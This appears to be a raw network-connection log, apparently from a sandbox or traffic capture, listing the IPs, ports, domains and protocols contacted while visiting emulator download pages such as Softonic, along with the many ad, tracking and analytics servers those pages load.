GB 18.165.201.123:443 ad.ldplayer.net tcp
N/A 127.0.0.1:6463 tcp
N/A 127.0.0.1:6464 tcp
N/A 127.0.0.1:6465 tcp
N/A 127.0.0.1:6466 tcp
N/A 127.0.0.1:6467 tcp
N/A 127.0.0.1:6468 tcp
N/A 127.0.0.1:6469 tcp
GB 18.165.201.123:443 ad.ldplayer.net tcp
N/A 127.0.0.1:6470 tcp
N/A 127.0.0.1:6471 tcp
GB 18.165.201.123:443 ad.ldplayer.net tcp
N/A 127.0.0.1:6472 tcp
GB 18.165.201.123:443 ad.ldplayer.net tcp
GB 18.165.201.123:443 ad.ldplayer.net tcp
GB 18.165.201.123:443 ad.ldplayer.net tcp
GB 18.165.201.123:443 ad.ldplayer.net tcp
GB 18.165.201.123:443 ad.ldplayer.net tcp
GB 18.165.201.123:443 ad.ldplayer.net tcp
US 216.239.32.116:443 beacons4.gvt2.com udp
NL 23.62.61.97:443 www.bing.com tcp
NL 23.62.61.97:443 www.bing.com tcp
US 35.190.80.1:443 a.nel.cloudflare.com tcp
US 8.8.8.8:53 th.bing.com udp
US 8.8.8.8:53 r.bing.com udp
NL 23.62.61.194:443 r.bing.com tcp
NL 23.62.61.97:443 r.bing.com tcp
NL 23.62.61.97:443 r.bing.com tcp
NL 23.62.61.194:443 r.bing.com tcp
US 35.190.80.1:443 a.nel.cloudflare.com tcp
US 8.8.8.8:53 194.61.62.23.in-addr.arpa udp
US 35.190.80.1:443 a.nel.cloudflare.com udp
US 8.8.8.8:53 bing.com udp
US 204.79.197.200:443 bing.com tcp
US 8.8.8.8:53 200.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 www.pchelpsoft.com udp
US 172.67.73.195:443 www.pchelpsoft.com tcp
US 172.67.73.195:443 www.pchelpsoft.com tcp
US 172.67.73.195:443 www.pchelpsoft.com tcp
US 8.8.8.8:53 195.73.67.172.in-addr.arpa udp
US 8.8.8.8:53 stackpath.bootstrapcdn.com udp
US 8.8.8.8:53 cloud.pchelpsoft.com udp
US 8.8.8.8:53 ajax.googleapis.com udp
US 8.8.8.8:53 cdnjs.cloudflare.com udp
US 8.8.8.8:53 get.geojs.io udp
US 104.18.10.207:443 stackpath.bootstrapcdn.com tcp
US 104.18.10.207:443 stackpath.bootstrapcdn.com tcp
US 104.18.10.207:443 stackpath.bootstrapcdn.com tcp
US 104.18.10.207:443 stackpath.bootstrapcdn.com tcp
US 8.8.8.8:53 207.10.18.104.in-addr.arpa udp
US 104.17.25.14:443 cdnjs.cloudflare.com tcp
US 216.239.34.21:443 cloud.pchelpsoft.com tcp
US 104.26.0.100:443 get.geojs.io tcp
GB 216.58.212.202:443 ajax.googleapis.com tcp
US 8.8.8.8:53 apps.identrust.com udp
NL 23.63.101.153:80 apps.identrust.com tcp
NL 23.63.101.153:80 apps.identrust.com tcp
US 8.8.8.8:53 14.25.17.104.in-addr.arpa udp
US 8.8.8.8:53 100.0.26.104.in-addr.arpa udp
US 8.8.8.8:53 21.34.239.216.in-addr.arpa udp
US 8.8.8.8:53 202.212.58.216.in-addr.arpa udp
US 8.8.8.8:53 153.101.63.23.in-addr.arpa udp
US 8.8.8.8:53 store.pchelpsoft.com udp
US 104.19.177.52:443 cdn.cookielaw.org tcp
CA 64.18.87.10:443 store.pchelpsoft.com tcp
US 104.19.177.52:443 cdn.cookielaw.org tcp
US 172.64.155.119:443 geolocation.onetrust.com tcp
US 8.8.8.8:53 10.87.18.64.in-addr.arpa udp
US 8.8.8.8:53 www.clarity.ms udp
US 13.107.246.64:443 www.clarity.ms tcp
US 8.8.8.8:53 c.clarity.ms udp
IE 13.74.129.1:443 c.clarity.ms tcp
US 8.8.8.8:53 www.google.com udp
GB 142.250.200.3:443 www.google.co.uk tcp
GB 142.250.187.196:443 www.google.com tcp
US 8.8.8.8:53 1.129.74.13.in-addr.arpa udp
GB 142.250.187.196:443 www.google.com tcp
GB 142.250.187.196:443 www.google.com tcp
US 8.8.8.8:53 c.bing.com udp
GB 142.250.200.3:443 www.google.co.uk tcp
US 13.107.21.237:443 c.bing.com tcp
US 20.114.190.119:443 x.clarity.ms tcp
US 8.8.8.8:53 analytics.fatmedia.io udp
US 8.8.8.8:53 privacyportal-eu.onetrust.com udp
US 8.8.8.8:53 bat.bing.com udp
US 216.239.34.21:443 analytics.fatmedia.io tcp
US 104.18.32.137:443 privacyportal-eu.onetrust.com tcp
US 8.8.8.8:53 137.32.18.104.in-addr.arpa udp
US 8.8.8.8:53 93.65.42.20.in-addr.arpa udp
NL 23.62.61.194:443 r.bing.com tcp
US 204.79.197.237:443 bat.bing.com tcp
NL 20.190.160.22:443 login.microsoftonline.com tcp
NL 20.190.160.22:443 login.microsoftonline.com tcp
US 8.8.8.8:53 services.bingapis.com udp
US 13.107.5.80:443 services.bingapis.com tcp
US 8.8.8.8:53 22.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 80.5.107.13.in-addr.arpa udp
US 8.8.8.8:53 133.32.126.40.in-addr.arpa udp
US 172.64.154.167:443 www2.bing.com tcp
US 172.64.154.167:443 www2.bing.com tcp
US 8.8.8.8:53 167.154.64.172.in-addr.arpa udp
US 8.8.8.8:53 aefd.nelreports.net udp
US 2.19.252.146:443 aefd.nelreports.net tcp
US 2.19.252.146:443 aefd.nelreports.net tcp
US 2.19.252.146:443 aefd.nelreports.net udp
US 8.8.8.8:53 146.252.19.2.in-addr.arpa udp
US 8.8.8.8:53 pc-androidemulator.com udp
DE 77.37.53.96:443 pc-androidemulator.com tcp
DE 77.37.53.96:443 pc-androidemulator.com tcp
US 8.8.8.8:53 96.53.37.77.in-addr.arpa udp
US 8.8.8.8:53 privacy.gatekeeperconsent.com udp
US 172.67.199.186:443 privacy.gatekeeperconsent.com tcp
US 8.8.8.8:53 g.ezoic.net udp
FR 15.188.219.54:443 g.ezoic.net tcp
US 8.8.8.8:53 go.ezodn.com udp
US 8.8.8.8:53 the.gatekeeperconsent.com udp
GB 142.250.187.238:443 www.youtube.com tcp
US 172.67.142.121:443 go.ezodn.com tcp
US 172.67.142.121:443 go.ezodn.com tcp
US 8.8.8.8:53 186.199.67.172.in-addr.arpa udp
US 8.8.8.8:53 54.219.188.15.in-addr.arpa udp
US 8.8.8.8:53 2.169.217.172.in-addr.arpa udp
US 8.8.8.8:53 121.142.67.172.in-addr.arpa udp
US 104.21.42.32:443 the.gatekeeperconsent.com tcp
GB 142.250.187.238:443 www.youtube.com udp
US 8.8.8.8:53 32.42.21.104.in-addr.arpa udp
FR 15.188.219.54:443 g.ezoic.net tcp
US 8.8.8.8:53 region1.analytics.google.com udp
US 216.239.32.36:443 region1.analytics.google.com tcp
US 8.8.8.8:53 stats.g.doubleclick.net udp
GB 142.250.200.3:443 www.google.co.uk udp
BE 64.233.167.157:443 stats.g.doubleclick.net tcp
GB 172.217.16.225:443 tpc.googlesyndication.com tcp
GB 172.217.16.225:443 tpc.googlesyndication.com tcp
GB 172.217.16.225:443 tpc.googlesyndication.com tcp
GB 172.217.16.225:443 tpc.googlesyndication.com tcp
GB 172.217.16.225:443 tpc.googlesyndication.com tcp
GB 172.217.16.225:443 tpc.googlesyndication.com tcp
GB 142.250.187.196:443 www.google.com udp
GB 172.217.16.225:443 tpc.googlesyndication.com udp
GB 142.250.187.196:443 www.google.com udp
US 8.8.8.8:53 36.32.239.216.in-addr.arpa udp
US 8.8.8.8:53 secure.quantserve.com udp
DE 91.228.74.244:443 secure.quantserve.com tcp
US 8.8.8.8:53 rules.quantcount.com udp
GB 18.245.187.126:443 rules.quantcount.com tcp
US 8.8.8.8:53 pixel.quantserve.com udp
US 8.8.8.8:53 244.74.228.91.in-addr.arpa udp
US 8.8.8.8:53 126.187.245.18.in-addr.arpa udp
US 216.239.32.36:443 region1.analytics.google.com udp
US 8.8.8.8:53 googleads.g.doubleclick.net udp
US 8.8.8.8:53 th.bing.com udp
US 8.8.8.8:53 r.bing.com udp
US 8.8.8.8:53 smartgaga-android-emulator.en.softonic.com udp
US 151.101.65.91:443 smartgaga-android-emulator.en.softonic.com tcp
US 151.101.65.91:443 smartgaga-android-emulator.en.softonic.com tcp
US 151.101.65.91:443 smartgaga-android-emulator.en.softonic.com udp
US 8.8.8.8:53 91.65.101.151.in-addr.arpa udp
US 172.64.154.167:443 www2.bing.com tcp
US 8.8.8.8:53 images.sftcdn.net udp
US 8.8.8.8:53 sc.sftcdn.net udp
US 8.8.8.8:53 softonic.com udp
US 172.64.154.167:443 www2.bing.com tcp
US 8.8.8.8:53 sdk.privacy-center.org udp
US 151.101.129.91:443 sc.sftcdn.net tcp
US 151.101.129.91:443 sc.sftcdn.net tcp
US 151.101.129.91:443 sc.sftcdn.net tcp
US 8.8.8.8:53 c.amazon-adsystem.com udp
US 23.219.230.135:443 images.sftcdn.net tcp
US 23.219.230.135:443 images.sftcdn.net tcp
US 23.219.230.135:443 images.sftcdn.net tcp
US 23.219.230.135:443 images.sftcdn.net tcp
US 23.219.230.135:443 images.sftcdn.net tcp
US 23.219.230.135:443 images.sftcdn.net tcp
US 199.232.213.91:443 softonic.com tcp
US 199.232.213.91:443 softonic.com tcp
US 151.101.129.91:443 sc.sftcdn.net tcp
US 151.101.129.91:443 sc.sftcdn.net tcp
GB 13.224.222.64:443 sdk.privacy-center.org tcp
US 8.8.8.8:53 www.adsensecustomsearchads.com udp
GB 13.224.223.9:443 c.amazon-adsystem.com tcp
GB 142.250.187.238:443 www.adsensecustomsearchads.com tcp
US 8.8.8.8:53 www.datadoghq-browser-agent.com udp
GB 13.224.223.9:443 c.amazon-adsystem.com tcp
US 8.8.8.8:53 btloader.com udp
GB 18.172.152.36:443 www.datadoghq-browser-agent.com tcp
US 104.22.74.216:443 btloader.com tcp
US 8.8.8.8:53 91.129.101.151.in-addr.arpa udp
US 8.8.8.8:53 91.213.232.199.in-addr.arpa udp
US 8.8.8.8:53 135.230.219.23.in-addr.arpa udp
US 8.8.8.8:53 64.222.224.13.in-addr.arpa udp
US 8.8.8.8:53 36.152.172.18.in-addr.arpa udp
US 8.8.8.8:53 216.74.22.104.in-addr.arpa udp
GB 142.250.180.27:443 storage.googleapis.com tcp
US 8.8.8.8:53 config.aps.amazon-adsystem.com udp
GB 52.84.90.106:443 config.aps.amazon-adsystem.com tcp
US 8.8.8.8:53 api.btloader.com udp
US 8.8.8.8:53 ad-delivery.net udp
US 104.22.53.86:443 cdn.id5-sync.com tcp
US 172.67.69.19:443 ad-delivery.net tcp
US 172.67.69.19:443 ad-delivery.net tcp
US 130.211.23.194:443 api.btloader.com tcp
GB 142.250.180.27:443 storage.googleapis.com tcp
US 130.211.23.194:443 api.btloader.com tcp
US 172.67.69.19:443 ad-delivery.net tcp
US 8.8.8.8:53 x.clarity.ms udp
US 20.114.190.119:443 x.clarity.ms tcp
US 130.211.23.194:443 api.btloader.com udp
US 8.8.8.8:53 notix.io udp
NL 139.45.197.253:443 notix.io tcp
US 8.8.8.8:53 6.200.250.142.in-addr.arpa udp
US 8.8.8.8:53 19.69.67.172.in-addr.arpa udp
US 8.8.8.8:53 beacons.gcp.gvt2.com udp
US 8.8.8.8:53 google.com udp
US 8.8.8.8:53 253.197.45.139.in-addr.arpa udp
GB 142.250.178.14:443 google.com udp
GB 172.217.169.67:443 beacons.gcp.gvt2.com udp
GB 216.58.213.3:443 beacons5.gvt3.com udp
US 8.8.8.8:53 5270af5ee5b7e05ab095db74c007355d.safeframe.googlesyndication.com udp
US 8.8.8.8:53 api.privacy-center.org udp
US 8.8.8.8:53 shb.richaudience.com udp
US 8.8.8.8:53 ap.lijit.com udp
US 8.8.8.8:53 ad.360yield.com udp
DE 162.19.138.119:443 lb.eu-1-id5-sync.com tcp
US 8.8.8.8:53 hb-api.omnitagjs.com udp
DE 162.19.138.119:443 lb.eu-1-id5-sync.com tcp
US 8.8.8.8:53 prebid.media.net udp
US 8.8.8.8:53 ib.adnxs.com udp
US 8.8.8.8:53 hbopenbid.pubmatic.com udp
US 8.8.8.8:53 htlb.casalemedia.com udp
US 8.8.8.8:53 id.crwdcntrl.net udp
US 8.8.8.8:53 aax.amazon-adsystem.com udp
DE 162.19.138.116:443 lb.eu-1-id5-sync.com tcp
US 8.8.8.8:53 partner.googleadservices.com udp
US 8.8.8.8:53 cdn.jsdelivr.net udp
US 8.8.8.8:53 tags.crwdcntrl.net udp
NL 178.250.1.3:443 static.criteo.net tcp
GB 108.138.233.27:443 api.privacy-center.org tcp
GB 142.250.187.238:443 www.adsensecustomsearchads.com udp
GB 172.217.169.65:443 5270af5ee5b7e05ab095db74c007355d.safeframe.googlesyndication.com tcp
FR 185.255.84.150:443 hb-api.omnitagjs.com tcp
IE 54.72.92.11:443 ap.lijit.com tcp
US 34.120.63.153:443 prebid.media.net tcp
DE 46.4.139.58:443 shb.richaudience.com tcp
DE 46.4.139.58:443 shb.richaudience.com tcp
DE 46.4.139.58:443 shb.richaudience.com tcp
IE 52.50.226.183:443 ad.360yield.com tcp
NL 185.89.211.84:443 ib.adnxs.com tcp
US 104.18.36.155:443 htlb.casalemedia.com tcp
US 178.128.135.204:443 brightcombid.marphezis.com tcp
GB 185.64.190.77:443 hbopenbid.pubmatic.com tcp
IE 108.128.111.241:443 id.crwdcntrl.net tcp
US 151.101.193.229:443 cdn.jsdelivr.net tcp
US 104.18.35.167:443 cdn-ima.33across.com tcp
GB 142.250.178.2:443 partner.googleadservices.com tcp
US 8.8.8.8:53 www.google.co.uk udp
US 8.8.8.8:53 www.google.com udp
GB 18.245.143.58:443 tags.crwdcntrl.net tcp
GB 18.172.154.232:443 aax.amazon-adsystem.com tcp
GB 142.250.200.3:443 www.google.co.uk udp
GB 172.217.169.65:443 5270af5ee5b7e05ab095db74c007355d.safeframe.googlesyndication.com tcp
IE 54.72.92.11:443 ap.lijit.com tcp
FR 185.255.84.150:443 hb-api.omnitagjs.com tcp
IE 52.50.226.183:443 ad.360yield.com tcp
NL 185.89.211.84:443 ib.adnxs.com tcp
IE 108.128.111.241:443 id.crwdcntrl.net tcp
DE 162.19.138.116:443 lb.eu-1-id5-sync.com tcp
US 151.101.193.229:443 cdn.jsdelivr.net tcp
NL 178.250.1.3:443 static.criteo.net tcp
BE 64.233.167.157:443 stats.g.doubleclick.net udp
US 8.8.8.8:53 ampcid.google.com udp
US 8.8.8.8:53 27.233.138.108.in-addr.arpa udp
US 8.8.8.8:53 77.190.64.185.in-addr.arpa udp
US 8.8.8.8:53 58.139.4.46.in-addr.arpa udp
US 8.8.8.8:53 167.35.18.104.in-addr.arpa udp
US 8.8.8.8:53 2.178.250.142.in-addr.arpa udp
US 8.8.8.8:53 204.135.128.178.in-addr.arpa udp
US 8.8.8.8:53 58.143.245.18.in-addr.arpa udp
US 8.8.8.8:53 lexicon.33across.com udp
US 8.8.8.8:53 150.84.255.185.in-addr.arpa udp
US 8.8.8.8:53 84.211.89.185.in-addr.arpa udp
GB 216.58.212.206:443 ampcid.google.com tcp
US 8.8.8.8:53 183.226.50.52.in-addr.arpa udp
US 8.8.8.8:53 11.92.72.54.in-addr.arpa udp
US 8.8.8.8:53 229.193.101.151.in-addr.arpa udp
US 8.8.8.8:53 241.111.128.108.in-addr.arpa udp
US 8.8.8.8:53 bcp.crwdcntrl.net udp
US 35.244.193.51:443 lexicon.33across.com tcp
IE 34.254.52.227:443 bcp.crwdcntrl.net tcp
NL 178.250.1.11:443 gum.criteo.com tcp
US 8.8.8.8:53 syndicatedsearch.goog udp
GB 172.217.16.238:443 syndicatedsearch.goog tcp
US 8.8.8.8:53 ag.gbc.criteo.com udp
US 8.8.8.8:53 gem.gbc.criteo.com udp
NL 185.235.87.150:443 ag.gbc.criteo.com tcp
NL 185.235.87.44:443 gem.gbc.criteo.com tcp
NL 178.250.1.11:443 gum.criteo.com tcp
NL 185.235.87.44:443 gem.gbc.criteo.com tcp
US 8.8.8.8:53 206.212.58.216.in-addr.arpa udp
US 8.8.8.8:53 226.21.18.104.in-addr.arpa udp
US 8.8.8.8:53 51.193.244.35.in-addr.arpa udp
US 8.8.8.8:53 150.87.235.185.in-addr.arpa udp
US 8.8.8.8:53 44.87.235.185.in-addr.arpa udp
US 8.8.8.8:53 ads.pubmatic.com udp
US 8.8.8.8:53 visitor.omnitagjs.com udp
US 8.8.8.8:53 acdn.adnxs.com udp
US 8.8.8.8:53 js-sec.indexww.com udp
US 8.8.8.8:53 contextual.media.net udp
US 8.8.8.8:53 sync.richaudience.com udp
GB 2.21.188.239:443 ads.pubmatic.com tcp
US 151.101.65.108:443 acdn.adnxs.com tcp
US 172.64.149.180:443 js-sec.indexww.com tcp
FR 185.255.84.153:443 visitor.omnitagjs.com tcp
BE 23.55.96.24:443 contextual.media.net tcp
DE 162.55.233.28:443 sync.richaudience.com tcp
DE 162.55.233.28:443 sync.richaudience.com tcp
US 8.8.8.8:53 cacerts.rapidssl.com udp
SE 192.229.221.95:80 cacerts.rapidssl.com tcp
US 8.8.8.8:53 player.aniview.com udp
US 8.8.8.8:53 ssc-cms.33across.com udp
US 2.20.12.70:443 player.aniview.com tcp
US 67.202.105.21:443 ssc-cms.33across.com tcp
DE 51.89.9.252:443 onetag-sys.com tcp
US 8.8.8.8:53 ssbsync.smartadserver.com udp
US 8.8.8.8:53 secure.adnxs.com udp
NL 178.250.1.9:443 dis.criteo.com tcp
US 8.8.8.8:53 api-2-0.spot.im udp
NL 46.228.174.117:443 sync.targeting.unrulymedia.com tcp
NL 81.17.55.122:443 ssbsync.smartadserver.com tcp
US 8.8.8.8:53 match.prod.bidr.io udp
US 15.197.193.217:443 match.adsrvr.org tcp
US 8.8.8.8:53 x.bidswitch.net udp
NL 198.47.127.18:443 image8.pubmatic.com tcp
US 8.8.8.8:53 sync.srv.stackadapt.com udp
DE 37.252.171.21:443 secure.adnxs.com tcp
DE 37.252.171.21:443 secure.adnxs.com tcp
US 8.8.8.8:53 ssum-sec.casalemedia.com udp
US 54.144.178.48:443 sync.srv.stackadapt.com tcp
IE 52.49.169.20:443 match.prod.bidr.io tcp
NL 35.214.149.91:443 x.bidswitch.net tcp
US 8.8.8.8:53 108.65.101.151.in-addr.arpa udp
US 8.8.8.8:53 180.149.64.172.in-addr.arpa udp
US 8.8.8.8:53 153.84.255.185.in-addr.arpa udp
US 8.8.8.8:53 28.233.55.162.in-addr.arpa udp
US 8.8.8.8:53 24.96.55.23.in-addr.arpa udp
US 8.8.8.8:53 70.12.20.2.in-addr.arpa udp
US 8.8.8.8:53 21.105.202.67.in-addr.arpa udp
US 8.8.8.8:53 122.55.17.81.in-addr.arpa udp
US 8.8.8.8:53 21.171.252.37.in-addr.arpa udp
DE 51.89.9.252:443 onetag-sys.com tcp
US 8.8.8.8:53 jadserve.postrelease.com udp
IE 54.171.23.218:443 jadserve.postrelease.com tcp
NL 46.228.174.117:443 sync.targeting.unrulymedia.com tcp
US 8.8.8.8:53 cs-server-s2s.yellowblue.io udp
US 8.8.8.8:53 id.rlcdn.com udp
US 54.88.237.240:443 cs-server-s2s.yellowblue.io tcp
US 8.8.8.8:53 bttrack.com udp
US 35.244.174.68:443 id.rlcdn.com tcp
US 64.38.119.44:443 bttrack.com tcp
US 8.8.8.8:53 cdn.indexww.com udp
US 8.8.8.8:53 sync.aniview.com udp
US 96.46.186.182:443 sync.aniview.com tcp
US 96.46.186.182:443 sync.aniview.com tcp
GB 18.164.68.117:443 api-2-0.spot.im tcp
US 8.8.8.8:53 20.169.49.52.in-addr.arpa udp
US 8.8.8.8:53 48.178.144.54.in-addr.arpa udp
US 8.8.8.8:53 218.23.171.54.in-addr.arpa udp
US 8.8.8.8:53 68.174.244.35.in-addr.arpa udp
US 8.8.8.8:53 44.119.38.64.in-addr.arpa udp
US 8.8.8.8:53 240.237.88.54.in-addr.arpa udp
US 8.8.8.8:53 182.186.46.96.in-addr.arpa udp
US 8.8.8.8:53 secure-assets.rubiconproject.com udp
US 8.8.8.8:53 sync.search.spotxchange.com udp
US 34.36.216.150:443 pixel-sync.sitescout.com tcp
NL 35.214.149.91:443 x.bidswitch.net tcp
US 34.36.216.150:443 pixel-sync.sitescout.com udp
US 8.8.8.8:53 rtb.mfadsrvr.com udp
US 8.8.8.8:53 pixel-eu.rubiconproject.com udp
US 8.8.8.8:53 ads.stickyadstv.com udp
NL 69.173.156.148:443 pixel-eu.rubiconproject.com tcp
US 8.8.8.8:53 cs.admanmedia.com udp
US 8.8.8.8:53 t.adx.opera.com udp
DE 51.89.9.252:443 onetag-sys.com udp
US 8.8.8.8:53 ssbsync-global.smartadserver.com udp
US 172.67.40.173:443 mwzeom.zeotap.com tcp
GB 216.58.201.98:443 cm.g.doubleclick.net tcp
US 216.200.232.253:443 sync.mathtag.com tcp
NL 69.173.156.149:443 pixel-eu.rubiconproject.com tcp
NL 82.145.213.8:443 t.adx.opera.com tcp
NL 154.57.158.115:443 ads.stickyadstv.com tcp
US 80.77.87.163:443 cs.admanmedia.com tcp
FR 5.135.209.101:443 ssbsync-global.smartadserver.com tcp
NL 35.214.199.88:443 rtb.mfadsrvr.com tcp
GB 216.58.201.98:443 cm.g.doubleclick.net udp
US 8.8.8.8:53 117.68.164.18.in-addr.arpa udp
US 8.8.8.8:53 149.156.173.69.in-addr.arpa udp
US 8.8.8.8:53 115.158.57.154.in-addr.arpa udp
US 8.8.8.8:53 101.209.135.5.in-addr.arpa udp
US 8.8.8.8:53 163.87.77.80.in-addr.arpa udp
US 8.8.8.8:53 88.199.214.35.in-addr.arpa udp
US 8.8.8.8:53 253.232.200.216.in-addr.arpa udp
US 8.8.8.8:53 s.amazon-adsystem.com udp
US 52.46.155.104:443 s.amazon-adsystem.com tcp
ES 23.60.223.190:443 secure-assets.rubiconproject.com tcp
US 199.232.213.91:443 softonic.com udp
US 8.8.8.8:53 eus.rubiconproject.com udp
BE 23.55.98.169:443 eus.rubiconproject.com tcp
US 8.8.8.8:53 token.rubiconproject.com udp
NL 69.173.156.148:443 token.rubiconproject.com tcp
US 8.8.8.8:53 connect.facebook.net udp
GB 163.70.147.23:443 connect.facebook.net tcp
US 8.8.8.8:53 190.223.60.23.in-addr.arpa udp
US 8.8.8.8:53 104.155.46.52.in-addr.arpa udp
US 8.8.8.8:53 169.98.55.23.in-addr.arpa udp
NL 178.250.1.25:443 csm.nl3.eu.criteo.net tcp
US 8.8.8.8:53 19535c0ff646237f62dc7d48e66cc8d0.safeframe.googlesyndication.com udp
US 34.120.63.153:443 prebid.media.net udp
US 8.8.8.8:53 www.facebook.com udp
GB 163.70.147.35:443 www.facebook.com tcp
GB 163.70.147.35:443 www.facebook.com tcp
US 8.8.8.8:53 35.147.70.163.in-addr.arpa udp
US 8.8.8.8:53 aax-eu.amazon-adsystem.com udp
IE 67.220.224.144:443 aax-eu.amazon-adsystem.com tcp
NL 139.45.197.253:443 notix.io tcp
DE 162.19.138.119:443 lb.eu-1-id5-sync.com tcp
DE 162.19.138.116:443 lb.eu-1-id5-sync.com tcp
US 8.8.8.8:53 144.224.220.67.in-addr.arpa udp
US 8.8.8.8:53 en.softonic.com udp
NL 81.17.55.122:443 ssbsync.smartadserver.com tcp
NL 46.228.174.117:443 sync.targeting.unrulymedia.com tcp
IE 52.49.169.20:443 match.prod.bidr.io tcp
US 54.144.178.48:443 sync.srv.stackadapt.com tcp
US 35.244.174.68:443 id.rlcdn.com udp
NL 35.214.199.88:443 rtb.mfadsrvr.com udp
US 8.8.8.8:53 beacons3.gvt2.com udp
US 2.19.252.146:443 aefd.nelreports.net udp
US 8.8.8.8:53 ib.adnxs.com udp
US 8.8.8.8:53 ad.360yield.com udp
US 178.128.135.204:443 brightcombid.marphezis.com tcp
US 34.120.63.153:443 prebid.media.net udp
US 8.8.8.8:53 hb-api.omnitagjs.com udp
NL 185.89.210.20:443 ib.adnxs.com tcp
FR 185.255.84.151:443 hb-api.omnitagjs.com tcp
NL 185.89.210.20:443 ib.adnxs.com tcp
FR 185.255.84.151:443 hb-api.omnitagjs.com tcp
US 8.8.8.8:53 securepubads.g.doubleclick.net udp
NL 185.89.210.20:443 ib.adnxs.com tcp
FR 185.255.84.151:443 hb-api.omnitagjs.com tcp
US 8.8.8.8:53 s.richaudience.com udp
DE 178.63.241.79:443 s.richaudience.com tcp
IE 52.19.230.196:443 ad.360yield.com tcp
IE 52.19.230.196:443 ad.360yield.com tcp
US 8.8.8.8:53 20.210.89.185.in-addr.arpa udp
US 8.8.8.8:53 151.84.255.185.in-addr.arpa udp
US 8.8.8.8:53 79.241.63.178.in-addr.arpa udp
US 8.8.8.8:53 196.230.19.52.in-addr.arpa udp
US 8.8.8.8:53 x.clarity.ms udp
US 20.114.190.119:443 x.clarity.ms tcp
US 20.114.190.119:443 x.clarity.ms tcp
DE 46.4.139.58:443 shb.richaudience.com tcp
US 8.8.8.8:53 smartgaga-android-emulator.en.softonic.com udp
US 8.8.8.8:53 tpc.googlesyndication.com udp
GB 172.217.16.225:443 tpc.googlesyndication.com udp
US 8.8.8.8:53 www.facebook.com udp
US 216.239.32.36:443 region1.analytics.google.com udp
GB 157.240.221.35:443 www.facebook.com tcp
GB 142.250.200.3:443 www.google.co.uk udp
US 8.8.8.8:53 en.softonic.com udp
US 151.101.1.91:443 en.softonic.com udp
BE 64.233.167.157:443 stats.g.doubleclick.net udp
GB 142.250.187.196:443 www.google.com udp
US 8.8.8.8:53 images.sftcdn.net udp
US 8.8.8.8:53 c.amazon-adsystem.com udp
US 8.8.8.8:53 sdk.privacy-center.org udp
GB 13.224.223.9:443 c.amazon-adsystem.com tcp
US 8.8.8.8:53 35.221.240.157.in-addr.arpa udp
US 8.8.8.8:53 91.1.101.151.in-addr.arpa udp
US 8.8.8.8:53 connect.facebook.net udp
GB 163.70.147.23:443 connect.facebook.net tcp
US 8.8.8.8:53 wct.softonic.com udp
US 8.8.8.8:53 25f9cc65b58580164f3593d0bc530d12.safeframe.googlesyndication.com udp
US 172.67.74.173:443 wct.softonic.com tcp
US 8.8.8.8:53 id5-sync.com udp
GB 216.58.212.194:443 googleads.g.doubleclick.net udp
FR 185.255.84.151:443 hb-api.omnitagjs.com tcp
US 8.8.8.8:53 js.adscale.de udp
US 130.211.23.194:443 api.btloader.com udp
DE 141.95.98.64:443 id5-sync.com tcp
GB 18.245.143.101:443 js.adscale.de tcp
NL 178.250.1.11:443 gum.criteo.com tcp
US 8.8.8.8:53 aax-eu.amazon-adsystem.com udp
US 8.8.8.8:53 prs.sftcdn.net udp
US 8.8.8.8:53 articles-img.sftcdn.net udp
US 151.101.1.91:443 prs.sftcdn.net tcp
US 151.101.1.91:443 prs.sftcdn.net tcp
US 151.101.1.91:443 prs.sftcdn.net tcp
US 151.101.1.91:443 prs.sftcdn.net tcp
US 151.101.1.91:443 prs.sftcdn.net tcp
US 151.101.1.91:443 prs.sftcdn.net tcp
US 8.8.8.8:53 ih.adscale.de udp
US 8.8.8.8:53 194.212.58.216.in-addr.arpa udp
US 8.8.8.8:53 173.74.67.172.in-addr.arpa udp
NL 23.62.61.178:443 articles-img.sftcdn.net tcp
NL 23.62.61.178:443 articles-img.sftcdn.net tcp
NL 23.62.61.178:443 articles-img.sftcdn.net tcp
US 8.8.8.8:53 64.98.95.141.in-addr.arpa udp
US 8.8.8.8:53 101.143.245.18.in-addr.arpa udp
DE 162.19.138.83:443 id5-sync.com tcp
DE 3.120.53.223:443 ih.adscale.de tcp
US 35.244.193.51:443 lexicon.33across.com udp
NL 178.250.1.11:443 gum.criteo.com tcp
NL 185.235.87.150:443 ag.gbc.criteo.com tcp
NL 185.235.87.44:443 gem.gbc.criteo.com tcp
US 8.8.8.8:53 push-sdk.com udp
DE 23.88.8.123:443 push-sdk.com tcp
US 172.67.74.173:443 wct.softonic.com tcp
DE 23.88.8.123:443 push-sdk.com tcp
US 8.8.8.8:53 cd.connatix.com udp
US 104.18.41.104:443 cd.connatix.com tcp
US 8.8.8.8:53 cds.connatix.com udp
US 8.8.8.8:53 uidsync.net udp
DE 178.63.248.56:443 uidsync.net tcp
US 8.8.8.8:53 226.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 83.138.19.162.in-addr.arpa udp
US 8.8.8.8:53 223.53.120.3.in-addr.arpa udp
US 8.8.8.8:53 104.41.18.104.in-addr.arpa udp
US 8.8.8.8:53 123.8.88.23.in-addr.arpa udp
DE 178.63.248.56:443 uidsync.net tcp
US 8.8.8.8:53 capi.connatix.com udp
US 8.8.8.8:53 56.248.63.178.in-addr.arpa udp
US 8.8.8.8:53 ins.connatix.com udp
US 8.8.8.8:53 vid.connatix.com udp
US 8.8.8.8:53 lit.connatix.com udp
US 8.8.8.8:53 notix.io udp
NL 139.45.197.227:443 notix.io tcp
US 8.8.8.8:53 227.197.45.139.in-addr.arpa udp
US 8.8.8.8:53 imasdk.googleapis.com udp
US 8.8.8.8:53 sync.richaudience.com udp
US 8.8.8.8:53 js-sec.indexww.com udp
US 8.8.8.8:53 contextual.media.net udp
GB 142.250.200.10:443 imasdk.googleapis.com tcp
US 8.8.8.8:53 visitor.omnitagjs.com udp
DE 157.90.211.246:443 sync.richaudience.com tcp
US 8.8.8.8:53 acdn.adnxs.com udp
US 8.8.8.8:53 ads.pubmatic.com udp
FR 185.255.84.152:443 visitor.omnitagjs.com tcp
US 8.8.8.8:53 img.connatix.com udp
US 8.8.8.8:53 gsf-fl.softonic.com udp
GB 142.250.200.10:443 imasdk.googleapis.com udp
US 199.232.194.133:443 gsf-fl.softonic.com tcp
US 8.8.8.8:53 s0.2mdn.net udp
US 8.8.8.8:53 diagnostics.id5-sync.com udp
GB 216.58.204.70:443 s0.2mdn.net tcp
US 8.8.8.8:53 246.211.90.157.in-addr.arpa udp
US 8.8.8.8:53 152.84.255.185.in-addr.arpa udp
US 8.8.8.8:53 133.194.232.199.in-addr.arpa udp
